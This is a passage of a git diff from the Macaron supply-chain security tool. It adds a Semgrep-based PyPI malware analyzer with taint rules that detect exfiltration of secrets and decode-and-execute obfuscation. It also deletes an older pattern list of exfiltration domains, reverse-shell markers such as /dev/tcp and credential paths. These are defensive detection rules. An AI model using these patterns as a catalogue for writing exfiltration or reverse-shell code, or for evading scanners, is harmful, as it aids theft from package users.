pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. + """ + analysis_result: dict = {} + # since we have to run them anyway, return disabled rule findings for debug information + disabled_results: dict = {} + # Here, we disable 'nosemgrep' ignoring so that this is not an evasion method of our scan (i.e. malware includes + # 'nosemgrep' comments to prevent our scan detecting those code lines). Read more about the 'nosemgrep' feature + # here: https://semgrep.dev/docs/ignoring-files-folders-code + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] + result: HeuristicResult = HeuristicResult.PASS + + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) + semgrep_commands.append(source_code_path) + + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") + logger.debug("executing: %s.", semgrep_commands) + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + try: + semgrep_output = json.loads(output_json_file.read()) + except (json.JSONDecodeError, UnicodeDecodeError) as output_read_error: + error_msg = f"Unable to read Semgrep JSON output: {output_read_error}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from output_read_error + + if not semgrep_output: + return result, {} + + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} + + for finding in semgrep_findings: + rule_id = json_extract(finding, ["check_id"], str) + file = json_extract(finding, ["path"], str) + if not rule_id or not file: + continue + + file = os.path.relpath(file, os.path.dirname(source_code_path)) + start = json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) + + # We manually filter out disabled rule IDs, as Semgrep's command line argument `--exclude-rule` appears to + # only work if `--experimental` is also supplied to enable experimental features, which we do not use. + # Semgrep provides a relative path separated by '.' to the rule ID, where the rule ID is always the + # final element in that path, so we use that to match our rule IDs. + # e.g. rule_id = src.macaron.resources.pypi_malware_rules.obfuscation_decode-and-execute, which comes from + # the rule ID 'obfuscation_decode-and-execute' inside 'obfuscation.yaml'. + if rule_id.split(".")[-1] in self.disabled_rule_ids: + if rule_id not in disabled_results: + disabled_results[rule_id] = {"message": message, "detections": []} + disabled_results[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + else: + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + # some semgrep rules were triggered, even after removing disabled ones + if analysis_result: + result = HeuristicResult.FAIL + + return result, { + "enabled_sourcecode_rule_findings": analysis_result, + "disabled_sourcecode_rule_findings": disabled_results, + } diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml deleted file mode 100644 index 9c15144d4..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. -imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -ast_calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -ast_constant: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 873bd2a20..b11f9cbe6 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 +67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..fd96eeef0 --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,271 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: exfiltration_remote-exfiltration + metadata: + description: Detects the flow of sensitive information to a remote endpoint. + message: Detected exfiltration of sensitive data to a remote endpoint + languages: + - python + severity: ERROR + mode: taint + options: + # this will help us detect the flow of objects for exfiltration, like + # "with requests.Session() as s: s.get(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + - pattern: os.popen(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) + + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) + - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + + # file exfiltration + - pattern: os.read(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..6d6ea066b --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,313 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: obfuscation_inline-imports + metadata: + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import + languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + +- id: obfuscation_obfuscation-tools + metadata: + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^\s*#\s*pyarmor:.* + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... + # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + - pattern: import demiurgic + +- id: obfuscation_decode-and-execute + metadata: + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. + message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + b'...'.decode(...) + - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').b64decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) + # unicode construction + - patterns: + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..56199e085 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,10 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" + force_analyze_source: bool + """When True, enforces running source code analysis, regardless of other heuristic results.""" class AnalyzeContext: @@ -106,7 +108,8 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, + force_analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index d75b0d94e..8fd2e5f83 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,9 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, + force_analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +155,12 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -190,8 +193,9 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, + force_analyze_source=force_analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +313,9 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, + force_analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +332,12 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. + force_analyze_source : bool + When true, enforces running source code analysis regardless of other heuristic results. Defaults to False. Returns ------- @@ -546,7 +553,8 @@ def run_single( # TODO Add release digest. ) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source + analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index e0e179e7f..a7d32fc18 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -26,7 +26,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.typosquatting_presence import TyposquattingPresenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext @@ -102,26 +102,46 @@ def _should_skip( return True return False - def validate_malware(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult], force: bool = False + ) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. + force: bool + Forces sourcecode analysis to run regardless of heuristic results. Defaults to False. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. """ - # TODO: This redundant function might be removed - sourcecode_analyzer = PyPISourcecodeAnalyzer(pypi_package_json) - is_malware, detail_info = sourcecode_analyzer.analyze() - return is_malware, detail_info + logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) + analyzer = PyPISourcecodeAnalyzer() + + if not force and analyzer.depends_on and 